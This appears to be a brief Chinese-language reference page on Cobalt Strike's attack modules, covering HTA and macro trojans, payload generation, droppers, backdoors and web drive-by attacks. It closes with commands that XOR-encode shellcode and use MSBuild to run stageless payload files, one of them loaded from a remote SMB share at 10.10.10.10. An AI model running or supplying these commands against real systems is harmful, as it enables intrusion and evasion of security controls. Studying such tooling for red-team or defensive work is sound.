攻击模块

名称功能

HTML Application

基于powershell的.hta格式的HTML Application木马,分为可执行文件、PowerShell、VBA三种方法

MS Office Macro

office宏病毒文件

Payload Generator

基于C、C#、COM Scriptlet、Java、Perl、PowerShell、Python、Ruby、VBA等语言的payload

USB/CD AutoPlay

利用USB/CD自动播放运行的木马

Windows Dropper

捆绑器

Windows Executable

生成32位或64位的exe和基于服务的可执行文件、DLL等后门

Windows Executable(S)

生成可执行文件,支持powershell脚本,提供代理功能

Web Drive-by基于WEB的攻击模块
名称功能

Manage

管理开启的模块

Clone Site

克隆网站

Host File

提供文件下载

Scripted Web Delivery

基于Web的攻击Payload

Signed Applet Attack

运行java自签名的攻击模块

Smart Applet Attack

自动检测Java版本并利用已知的exploits攻击

System Profiler

信息探测模块

自定义payload
* Attacks > Packages > Payload Generator 
* Attacks > Packages > Scripted Web Delivery (S)
$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor
$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml
$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml

最后更新于